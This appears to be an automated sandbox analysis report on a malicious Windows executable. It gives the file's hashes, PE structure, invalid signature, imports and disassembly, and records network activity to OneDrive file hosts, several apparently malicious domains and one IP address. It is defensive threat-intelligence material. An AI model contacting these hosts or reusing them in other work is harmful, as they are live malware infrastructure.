                                                                        SHA-256:46E31F337ED0D9A6FE3F159ABC91C9B9B6A6062982BBCD84A51784D7128E7AE4
                                                                        SHA-512:D63878F94F7699E4CC63C2CD885C29455E0C423D32DBA750E4FC3AA74DBACA80A1A4B176719213B9FC6584DE6A40CDDFF7864C7FB4CFBA13DFCB437A36E41B80
                                                                        Malicious:true
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................P......P......P......P..........@...P......P.|.....P......Rich............PE..d................"......2...n.......8.........@....................................G4....`.......... .......................................\...........F......................4....W..T............................P...............Q...............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......N..............@....pdata...............P..............@..@.rsrc....F.......H...T..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.799965627764192
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                        • InstallShield setup (43055/19) 0.43%
                                                                        • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        File name:Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File size:721408
                                                                        MD5:4e71f90d1817f44313f4e101ef393968
                                                                        SHA1:3932f9822134761e7bf9bc1902f8cc28b6820559
                                                                        SHA256:aace20e28e61cb328da74ff938231b1ce9a07498d477efe3efc5c5d3d04b9dc1
                                                                        SHA512:a50c0e27009521b2f34358fb3bc30afb661b75cb6ba715ac8be15f412b50600dc3a474bd90de74c1e1b3941f3bc0d80c7b7e16aa26969a4250ec7f4dcd234419
                                                                        SSDEEP:12288:hrnWDrl98a7LUacm7sbiD97T5QM4Pr4rvU/Oy/6:hrWnZnUivR71B48rvUD/6
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:b464c4d0f0e8dce0

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x470bb8
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:6b3ae8f7a807e67f6fac520b10e5dbe8

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=aaaaaaaaaaaaaaD
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 5/9/2021 10:18:49 PM 1/1/2040 12:59:59 AM
                                                                        Subject Chain
                                                                        • CN=aaaaaaaaaaaaaaD
                                                                        Version:3
                                                                        Thumbprint MD5:88DC567BBC512066E2853AA243DB487C
                                                                        Thumbprint SHA-1:587D5E176449F0353693C0BFC3F23ED2DA19EFD6
                                                                        Thumbprint SHA-256:AC56BB3F62BA8ECE00A2A667607C63DFE65689591205E9DEC229B407D579043A
                                                                        Serial:836D07F00609819F4959F48B45D1A746

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFF0h
                                                                        mov eax, 00470970h
                                                                        call 00007F56F0D49065h
                                                                        nop
                                                                        nop
                                                                        nop
                                                                        nop
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F56F0D96DF5h
                                                                        mov ecx, dword ptr [0047294Ch]
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov edx, dword ptr [00470244h]
                                                                        call 00007F56F0D96DF5h
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov byte ptr [eax+5Bh], 00000000h
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F56F0D96E5Eh
                                                                        call 00007F56F0D46C71h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x740000x273c.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x3475e.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xafe000x400.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x790000x6cfc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x780000x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        CODE0x10000x6fc0c0x6fe00False0.530143592877data6.58026450368IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        DATA0x710000x1bac0x1c00False0.456612723214data4.66718680142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        BSS0x730000xe0d0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .idata0x740000x273c0x2800False0.36455078125data4.88093111103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .tls0x770000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x780000x180x200False0.048828125data0.195201267787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc0x790000x6cfc0x6e00False0.626526988636data6.68175411026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x800000x3475e0x34800False0.380640811012data6.02117964138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_CURSOR0x807b40x134data
                                                                        RT_BITMAP0x808e80xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                        RT_ICON0x809d00x988dataEnglishUnited States
                                                                        RT_ICON0x813580x10a8dataEnglishUnited States
                                                                        RT_MENU0x824000x20dataEnglishUnited States
                                                                        RT_DIALOG0x824200x52data
                                                                        RT_STRING0x824740x260data
                                                                        RT_STRING0x826d40x1d8data
                                                                        RT_STRING0x828ac0x198data
                                                                        RT_STRING0x82a440x174data
                                                                        RT_STRING0x82bb80x308data
                                                                        RT_STRING0x82ec00xd8data
                                                                        RT_STRING0x82f980x118data
                                                                        RT_STRING0x830b00x268data
                                                                        RT_STRING0x833180x3f8data
                                                                        RT_STRING0x837100x360data
                                                                        RT_STRING0x83a700x440data
                                                                        RT_STRING0x83eb00x1b0data
                                                                        RT_STRING0x840600xecdata
                                                                        RT_STRING0x8414c0x1e4data
                                                                        RT_STRING0x843300x3f4data
                                                                        RT_STRING0x847240x334data
                                                                        RT_STRING0x84a580x2b4data
                                                                        RT_RCDATA0x84d0c0x10data
                                                                        RT_RCDATA0x84d1c0x1d96JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 180x300, frames 3GreekGreece
                                                                        RT_RCDATA0x86ab40x2f8data
                                                                        RT_RCDATA0x86dac0xf25JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 52x52, frames 3GreekGreece
                                                                        RT_RCDATA0x87cd40x2a5Delphi compiled form 'T__2520219415'
                                                                        RT_RCDATA0x87f7c0x136Delphi compiled form 'T__2520287816'
                                                                        RT_RCDATA0x880b40x2c672PC bitmap, Windows 3.x format, 225 x 225 x 4EnglishUnited States
                                                                        RT_GROUP_CURSOR0xb47280x14Lotus unknown worksheet or configuration, revision 0x1
                                                                        RT_GROUP_ICON0xb473c0x22dataEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                        kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                        gdi32.dllUnrealizeObject, SwapBuffers, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixelFormat, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, ChoosePixelFormat, BitBlt
                                                                        opengl32.dllwglMakeCurrent, wglGetCurrentDC, wglDeleteContext, wglCreateContext
                                                                        user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                        kernel32.dllSleep
                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                        ole32.dllCoUninitialize, CoInitialize
                                                                        oleaut32.dllGetErrorInfo, SysFreeString
                                                                        comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                        opengl32.dllglViewport, glVertex3f, glTranslatef, glTexParameteri, glTexGeni, glTexEnvi, glStencilOp, glStencilFunc, glScalef, glRotatef, glRenderMode, glPushMatrix, glPushAttrib, glPopMatrix, glPopAttrib, glPolygonMode, glPassThrough, glNewList, glMultMatrixf, glMatrixMode, glMaterialfv, glLoadIdentity, glListBase, glLightModelf, glIsList, glIsEnabled, glHint, glGetLightfv, glGetIntegerv, glGetFloatv, glGetDoublev, glGenLists, glFeedbackBuffer, glEndList, glEnd, glEnable, glDisable, glDepthMask, glDepthFunc, glDeleteLists, glColorMask, glClearColor, glClear, glCallLists, glCallList, glBlendFunc, glBegin, glAccum
                                                                        glu32.dllgluProject, gluPerspective
                                                                        opengl32.dllglDeleteTextures, glBindTexture, glDrawElements, glInterleavedArrays

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States
                                                                        GreekGreece

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 12, 2021 06:31:55.607753992 CEST4977980192.168.2.4198.54.117.212
                                                                        May 12, 2021 06:31:55.807626963 CEST8049779198.54.117.212192.168.2.4
                                                                        May 12, 2021 06:31:55.807984114 CEST4977980192.168.2.4198.54.117.212
                                                                        May 12, 2021 06:31:55.808212996 CEST4977980192.168.2.4198.54.117.212
                                                                        May 12, 2021 06:31:56.011090994 CEST8049779198.54.117.212192.168.2.4
                                                                        May 12, 2021 06:31:56.011116028 CEST8049779198.54.117.212192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 12, 2021 06:29:47.484730005 CEST4925753192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:47.536226034 CEST53492578.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:48.533021927 CEST6238953192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:48.593082905 CEST53623898.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:49.547907114 CEST4991053192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:49.599437952 CEST53499108.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:50.498460054 CEST5585453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:50.549935102 CEST53558548.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:51.887833118 CEST6454953192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:51.940377951 CEST53645498.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:53.130309105 CEST6315353192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:53.179060936 CEST53631538.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:54.682322025 CEST5299153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:54.731278896 CEST53529918.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:55.753710032 CEST5370053192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:55.802469969 CEST53537008.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:56.717904091 CEST5172653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:56.766731024 CEST53517268.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:57.679786921 CEST5679453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:57.728537083 CEST53567948.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:57.944706917 CEST5653453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:58.004832983 CEST53565348.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:58.782980919 CEST5662753192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:58.856905937 CEST53566278.8.8.8192.168.2.4
                                                                        May 12, 2021 06:29:58.877641916 CEST5662153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:29:58.928117037 CEST53566218.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:00.007709026 CEST6311653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:00.062721968 CEST53631168.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:01.824853897 CEST6407853192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:01.873616934 CEST53640788.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:03.586256027 CEST6480153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:03.634850979 CEST53648018.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:04.511248112 CEST6172153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:04.559984922 CEST53617218.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:05.450540066 CEST5125553192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:05.507631063 CEST53512558.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:06.617127895 CEST6152253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:06.668694973 CEST53615228.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:07.963816881 CEST5233753192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:08.015356064 CEST53523378.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:08.882314920 CEST5504653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:08.930938959 CEST53550468.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:18.074443102 CEST4961253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:18.131875038 CEST53496128.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:25.000952005 CEST4928553192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:25.060244083 CEST53492858.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:34.466051102 CEST5060153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:34.523298979 CEST53506018.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:35.224865913 CEST6087553192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:35.345573902 CEST53608758.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:41.528413057 CEST5644853192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:41.585371017 CEST53564488.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:42.116556883 CEST5917253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:42.173862934 CEST53591728.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:42.737309933 CEST6242053192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:42.794504881 CEST53624208.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:50.812347889 CEST6057953192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:50.931777000 CEST53605798.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:51.758012056 CEST5018353192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:51.820226908 CEST53501838.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:52.596374989 CEST6153153192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:52.691994905 CEST53615318.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:53.294857979 CEST4922853192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:53.352027893 CEST53492288.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:53.716151953 CEST5979453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:53.789351940 CEST53597948.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:54.153831959 CEST5591653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:54.210972071 CEST53559168.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:55.387531042 CEST5275253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:55.447463989 CEST53527528.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:56.135437012 CEST6054253192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:56.196213007 CEST53605428.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:57.714561939 CEST6068953192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:57.771917105 CEST53606898.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:58.025538921 CEST6420653192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:58.093370914 CEST53642068.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:59.075752020 CEST5090453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:59.136749983 CEST53509048.8.8.8192.168.2.4
                                                                        May 12, 2021 06:30:59.786062002 CEST5752553192.168.2.48.8.8.8
                                                                        May 12, 2021 06:30:59.846402884 CEST53575258.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:38.969013929 CEST5381453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:39.027034044 CEST53538148.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:40.445482969 CEST5341853192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:40.512960911 CEST53534188.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:45.296017885 CEST6283353192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:45.507781982 CEST53628338.8.8.8192.168.2.4
                                                                        May 12, 2021 06:31:55.542121887 CEST5926053192.168.2.48.8.8.8
                                                                        May 12, 2021 06:31:55.602200031 CEST53592608.8.8.8192.168.2.4
                                                                        May 12, 2021 06:32:01.389158964 CEST4994453192.168.2.48.8.8.8
                                                                        May 12, 2021 06:32:01.675105095 CEST53499448.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        May 12, 2021 06:29:57.944706917 CEST192.168.2.48.8.8.80x3f8aStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:29:58.782980919 CEST192.168.2.48.8.8.80xa3adStandard query (0)xhtfga.dm.files.1drv.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:30:34.466051102 CEST192.168.2.48.8.8.80x5ab7Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:30:35.224865913 CEST192.168.2.48.8.8.80x3e0eStandard query (0)xhtfga.dm.files.1drv.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:30:42.116556883 CEST192.168.2.48.8.8.80x3ac6Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:30:42.737309933 CEST192.168.2.48.8.8.80x8937Standard query (0)xhtfga.dm.files.1drv.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:45.296017885 CEST192.168.2.48.8.8.80xbd42Standard query (0)www.thrg33.clubA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.542121887 CEST192.168.2.48.8.8.80x3d1aStandard query (0)www.georgeswebwerks.comA (IP address)IN (0x0001)
                                                                        May 12, 2021 06:32:01.389158964 CEST192.168.2.48.8.8.80x70e6Standard query (0)www.rest-blog.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        May 12, 2021 06:29:58.004832983 CEST8.8.8.8192.168.2.40x3f8aNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
